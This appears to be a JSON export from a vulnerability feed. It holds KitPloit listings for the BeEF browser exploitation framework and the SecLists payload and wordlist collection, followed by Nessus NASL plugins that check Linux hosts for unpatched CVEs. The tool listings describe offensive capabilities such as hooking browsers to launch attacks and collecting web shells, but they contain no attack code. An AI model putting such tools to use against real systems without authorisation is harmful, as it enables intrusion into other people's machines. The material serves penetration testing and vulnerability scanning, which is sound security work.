{"kitploit": [{"lastseen": "2019-02-22T16:53:23", "bulletinFamily": "tools", "description": "** What is BeEF? ** \n\n\n** BeEF ** is short for ** The Browser Exploitation Framework ** . It is a penetration testing tool that focuses on the web browser. \n\nAmid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context. \n\n \n** Get Involved ** \nYou can get in touch with the BeEF team. Just check out the following: \n** Please, send us pull requests! 
** \n** Web: ** [ https://beefproject.com/ ](<https://beefproject.com/>) \n** Bugs: ** [ https://github.com/beefproject/beef/issues ](<https://github.com/beefproject/beef/issues>) \n** Security Bugs: ** [email protected] \n** IRC: ** ircs://irc.freenode.net/beefproject \n** Twitter: ** @beefproject \n \n** Requirements ** \n\n\n * Operating System: Mac OSX 10.5.0 or higher / modern Linux \n * [ Ruby ](<https://www.ruby-lang.org/>) : 2.3 or newer \n * [ SQLite ](<https://sqlite.org/>) : 3.x \n * [ Node.js ](<https://nodejs.org/>) : 6 or newer \n * The gems listed in the Gemfile: [ https://github.com/beefproject/beef/blob/master/Gemfile ](<https://github.com/beefproject/beef/blob/master/Gemfile>)\n * brew install selenium-server-standalone (See [ https://github.com/shvets/selenium ](<https://github.com/shvets/selenium>) ) \n \n** Quick Start ** \n** The following is for the impatient. ** \nThe ` install ` script installs the required operating system packages and all the prerequisite Ruby gems: \n$ ./install \nFor full installation details, please refer to [ INSTALL.txt ](<https://github.com/beefproject/beef/blob/master/INSTALL.txt>) . \nWe also have an [ Installation ](<https://github.com/beefproject/beef/wiki/Installation>) page on the wiki. \nUpon successful installation, be sure to read the [ Configuration ](<https://github.com/beefproject/beef/wiki/Configuration>) page on the wiki for important details on configuring and securing BeEF. 
\n \n** Usage ** \nTo get started, simply execute beef and follow the instructions: \n\n \n \n $ ./beef\n\n \n** [ Download Beef ](<https://github.com/beefproject/beef>) **\n", "modified": "2019-02-22T12:39:01", "published": "2019-02-22T12:39:01", "id": "KITPLOIT:6681544675241878887", "href": "http://www.kitploit.com/2019/02/beef-browser-exploitation-framework.html", "title": "BeEF - The Browser Exploitation Framework Project", "type": "kitploit", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-02-21T16:51:33", "bulletinFamily": "tools", "description": "SecLists is the security tester's companion. It's a collection of multiple types of lists used during security assessments, collected in one place. List types include usernames, passwords, URLs, sensitive data patterns, fuzzing payloads, web shells, and many more. The goal is to enable a security tester to pull this repository onto a new testing box and have access to every type of list that may be needed. \n\nThis project is maintained by [ Daniel Miessler ](<https://danielmiessler.com/>) , [ Jason Haddix ](<http://www.securityaegis.com/>) , and [ g0tmi1k ](<https://twitter.com/g0tmi1k>) . 
\n \n** Install ** \n** Zip ** \n\n \n \n wget -c https://github.com/danielmiessler/SecLists/archive/master.zip -O SecList.zip \\\n && unzip SecList.zip \\\n && rm -f SecList.zip\n\n** Git (Small) ** \n\n \n \n git clone --depth 1 https://github.com/danielmiessler/SecLists.git\n\n** Git (Complete) ** \n\n \n \n git clone [email\u00a0protected]:danielmiessler/SecLists.git\n\n** Kali Linux ** ( [ Tool Page ](<https://tools.kali.org/password-attacks/seclists>) ) \n\n \n \n apt -y install seclists\n\n \n \n\n\n** [ Download SecLists ](<https://github.com/danielmiessler/SecLists>) **\n", "modified": "2019-02-21T12:37:00", "published": "2019-02-21T12:37:00", "id": "KITPLOIT:759720852629062407", "href": "http://www.kitploit.com/2019/02/seclists-collection-of-multiple-types.html", "title": "SecLists - A Collection Of Multiple Types Of Lists Used During Security Assessments, Collected In One Place (Usernames, Passwords, URLs, Sensitive Data Patterns, Fuzzing Payloads, Web Shells, And Many More)", "type": "kitploit", "cvss": {"score": 0.0, "vector": "NONE"}}], "nessus": [{"lastseen": "2019-02-23T01:52:09", "bulletinFamily": "scanner", "description": "Security Fix(es) :\n\n - flatpak: potential /proc based sandbox escape (CVE-2019-8308)", "modified": "2019-02-22T00:00:00", "published": "2019-02-22T00:00:00", "id": "SL_20190221_FLATPAK_ON_SL7_X.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=122391", "title": "Scientific Linux Security Update : flatpak on SL7.x x86_64", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(122391);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2019/02/22 10:34:40\");\n\n script_cve_id(\"CVE-2019-8308\");\n\n script_name(english:\"Scientific Linux Security Update : flatpak on SL7.x x86_64\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n 
script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security Fix(es) :\n\n - flatpak: potential /proc based sandbox escape\n (CVE-2019-8308)\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1902&L=SCIENTIFIC-LINUX-ERRATA&P=7835\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?869fdc5a\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/02/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/02/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"firefox-60.5.1-1.el7_6\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"firefox-debuginfo-60.5.1-1.el7_6\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"flatpak-1.0.2-4.el7_6\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"flatpak-builder-1.0.0-4.el7_6\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"flatpak-debuginfo-1.0.2-4.el7_6\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"flatpak-devel-1.0.2-4.el7_6\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"flatpak-libs-1.0.2-4.el7_6\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.4, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-23T01:52:09", "bulletinFamily": "scanner", "description": "This update for 
texlive fixes the following issue :\n\nCVE-2018-17407: Prevent buffer overflow when handling of Type 1 fonts allowed arbitrary code execution when a malicious font was loaded by one of the vulnerable tools: pdflatex, pdftex, dvips, or luatex (bsc#1109673)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2019-02-22T00:00:00", "published": "2019-02-22T00:00:00", "id": "SUSE_SU-2018-3033-2.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=122393", "title": "SUSE SLES12 Security Update : texlive (SUSE-SU-2018:3033-2)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:3033-2.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(122393);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2019/02/22 10:34:40\");\n\n script_cve_id(\"CVE-2018-17407\");\n\n script_name(english:\"SUSE SLES12 Security Update : texlive (SUSE-SU-2018:3033-2)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for texlive fixes the following issue :\n\nCVE-2018-17407: Prevent buffer overflow when handling of Type 1 fonts\nallowed arbitrary code execution when a malicious font was loaded by\none of the vulnerable tools: pdflatex, pdftex, dvips, or luatex\n(bsc#1109673)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1109673\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-17407/\"\n );\n # https://www.suse.com/support/update/announcement/2019/suse-su-20183033-2/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?767631ab\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE OpenStack Cloud 7:zypper in -t patch\nSUSE-OpenStack-Cloud-7-2019-458=1\n\nSUSE Linux Enterprise Server for SAP 12-SP2:zypper in -t patch\nSUSE-SLE-SAP-12-SP2-2019-458=1\n\nSUSE Linux Enterprise Server 12-SP2-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-SP2-2019-458=1\n\nSUSE Linux Enterprise Server 12-SP2-BCL:zypper in -t patch\nSUSE-SLE-SERVER-12-SP2-BCL-2019-458=1\n\nSUSE Linux Enterprise Server 12-SP1-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-SP1-2019-458=1\n\nSUSE Linux Enterprise Server 12-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-2019-458=1\n\nSUSE Enterprise Storage 4:zypper in -t patch SUSE-Storage-4-2019-458=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libkpathsea6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libkpathsea6-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n 
script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/09/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/02/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = eregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! 
ereg(pattern:\"^(0|1|2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP0/1/2\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"libkpathsea6-6.2.0dev-22.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"libkpathsea6-debuginfo-6.2.0dev-22.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libkpathsea6-6.2.0dev-22.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libkpathsea6-debuginfo-6.2.0dev-22.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libkpathsea6-6.2.0dev-22.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libkpathsea6-debuginfo-6.2.0dev-22.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libkpathsea6-6.2.0dev-22.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libkpathsea6-debuginfo-6.2.0dev-22.3.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"texlive\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-23T01:52:09", "bulletinFamily": "scanner", "description": "Security Fix(es) :\n\n - systemd: Insufficient input validation in bus_process_object() resulting in PID 1 crash (CVE-2019-6454)", "modified": "2019-02-22T00:00:00", "published": "2019-02-22T00:00:00", "id": "SL_20190221_SYSTEMD_ON_SL7_X.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=122392", "title": "Scientific Linux Security Update : systemd on SL7.x x86_64", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific 
Linux.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(122392);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2019/02/22 10:34:40\");\n\n script_cve_id(\"CVE-2019-6454\");\n\n script_name(english:\"Scientific Linux Security Update : systemd on SL7.x x86_64\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security Fix(es) :\n\n - systemd: Insufficient input validation in\n bus_process_object() resulting in PID 1 crash\n (CVE-2019-6454)\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1902&L=SCIENTIFIC-LINUX-ERRATA&P=6852\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?10da97a4\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/02/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"libgudev1-219-62.el7_6.5\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"libgudev1-devel-219-62.el7_6.5\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"systemd-219-62.el7_6.5\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"systemd-debuginfo-219-62.el7_6.5\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"systemd-devel-219-62.el7_6.5\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"systemd-journal-gateway-219-62.el7_6.5\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"systemd-libs-219-62.el7_6.5\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"systemd-networkd-219-62.el7_6.5\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"systemd-python-219-62.el7_6.5\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"systemd-resolved-219-62.el7_6.5\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", 
reference:\"systemd-sysv-219-62.el7_6.5\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-02-23T01:52:08", "bulletinFamily": "scanner", "description": "This update upgrades Firefox to version 60.5.1 ESR.\n\nSecurity Fix(es) :\n\n - chromium-browser, mozilla: Use after free in Skia (CVE-2018-18356)\n\n - mozilla: Integer overflow in Skia (CVE-2019-5785)", "modified": "2019-02-22T00:00:00", "published": "2019-02-22T00:00:00", "id": "SL_20190219_FIREFOX_ON_SL6_X.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=122389", "title": "Scientific Linux Security Update : firefox on SL6.x i386/x86_64", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(122389);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2019/02/22 10:34:40\");\n\n script_cve_id(\"CVE-2018-18356\", \"CVE-2019-5785\");\n\n script_name(english:\"Scientific Linux Security Update : firefox on SL6.x i386/x86_64\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update upgrades Firefox to version 60.5.1 ESR.\n\nSecurity Fix(es) :\n\n - chromium-browser, mozilla: Use after free in Skia\n (CVE-2018-18356)\n\n - mozilla: Integer overflow in Skia (CVE-2019-5785)\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1902&L=SCIENTIFIC-LINUX-ERRATA&P=7176\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?2bca94ba\"\n );\n script_set_attribute(\n attribute:\"solution\", \n 
value:\"Update the affected firefox and / or firefox-debuginfo packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/12/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/02/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL6\", reference:\"firefox-60.5.1-1.el6_10\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"firefox-debuginfo-60.5.1-1.el6_10\")) flag++;\n\n\nif (flag)\n{\n if 
(report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-23T01:52:09", "bulletinFamily": "scanner", "description": "An update for flatpak is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nFlatpak is a system for building, distributing, and running sandboxed desktop applications on Linux.\n\nSecurity Fix(es) :\n\n* flatpak: potential /proc based sandbox escape (CVE-2019-8308)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\nNote that Tenable Network Security has attempted to extract the preceding description block directly from the corresponding Red Hat security advisory. Virtuozzo provides no description for VZLSA advisories. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2019-02-22T00:00:00", "published": "2019-02-22T00:00:00", "id": "VIRTUOZZO_VZLSA-2019-0375.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=122400", "title": "Virtuozzo 7 : flatpak / flatpak-builder / flatpak-devel / etc (VZLSA-2019-0375)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(122400);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2019/02/22 10:34:40\");\n\n script_cve_id(\n \"CVE-2019-8308\"\n );\n\n script_name(english:\"Virtuozzo 7 : flatpak / flatpak-builder / flatpak-devel / etc (VZLSA-2019-0375)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Virtuozzo host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update for flatpak is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nFlatpak is a system for building, distributing, and running sandboxed\ndesktop applications on Linux.\n\nSecurity Fix(es) :\n\n* flatpak: potential /proc based sandbox escape (CVE-2019-8308)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, acknowledgments, and other related information, refer to\nthe CVE page(s) listed in the References section.\n\nNote that Tenable Network Security has attempted to extract the\npreceding description block directly from the corresponding Red Hat\nsecurity advisory. Virtuozzo provides no description for VZLSA\nadvisories. 
Tenable has attempted to automatically clean and format\nit as much as possible without introducing additional issues.\");\n # http://repo.virtuozzo.com/vzlinux/announcements/json/VZLSA-2019-0375.json\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?103e30e8\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2019:0375\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected flatpak / flatpak-builder / flatpak-devel / etc package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/02/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/22\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:flatpak\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:flatpak-builder\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:flatpak-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:flatpak-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:virtuozzo:virtuozzo:7\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Virtuozzo Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. 
